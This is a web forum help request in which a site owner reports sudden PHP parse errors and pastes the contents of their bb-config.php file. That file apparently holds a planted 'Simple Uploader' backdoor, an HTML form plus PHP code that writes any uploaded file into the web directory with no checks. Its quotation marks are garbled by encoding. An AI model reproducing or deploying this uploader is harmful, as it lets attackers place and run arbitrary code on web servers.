Sudden BBconfig issues
-
Suddenly I cannot access my forums and am getting this error :
Warning: Unexpected character in input: ” (ASCII=92) state=1 in /home//bb-config.php on line 5
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/bb-config.php on line 17
I’ve deactivated all plugins on the main blog. This has the buddypress integration.
The last tampering before I noticed this was a single size change for a widget block in the themes stylesheet but the problem persists with switching themes. It cuts the homepage to half size as well without a scroll.
This is the bb-config:
title> Simple Uploader</title>
<body bgcolor=î#000000″ text=î#808080″ link=î#808080″ vlink=î#808080″>
<div align=îcenterî>
<center><font style=îfont-size: 16pt;î color=îlimeî face=îArialî>Simple uploader</font> </center>
<form enctype=îmultipart/form-dataî action=î<?php echo $_SERVER[“PHP_SELF”]; ?>î method=îpostî>
<div align=îcenterî STYLE=îfont-family: verdana; font-size: 10px;î>
<input type=îhiddenî name=îMAX_FILE_SIZEî value=î10000000024″>
File :
<input name=îuserfileî type=îfileî />
<input name=îsubmitî type=îsubmitî value=îUploadî />
</div>
</form>
<div align=îcenterî STYLE=îfont-family: verdana; font-size: 10px;î>
<?php
if (@is_uploaded_file($_FILES[“userfile”][“tmp_name”])) {
copy($_FILES[“userfile”][“tmp_name”], ìî . $_FILES[“userfile”][“name”]);
echo ì<p>File uploaded successfully</p>î;
}
?>
It’s been working properly for months with my new theme, any suggestions?
I don’t have any extra forum related plugin
- You must be logged in to reply to this topic.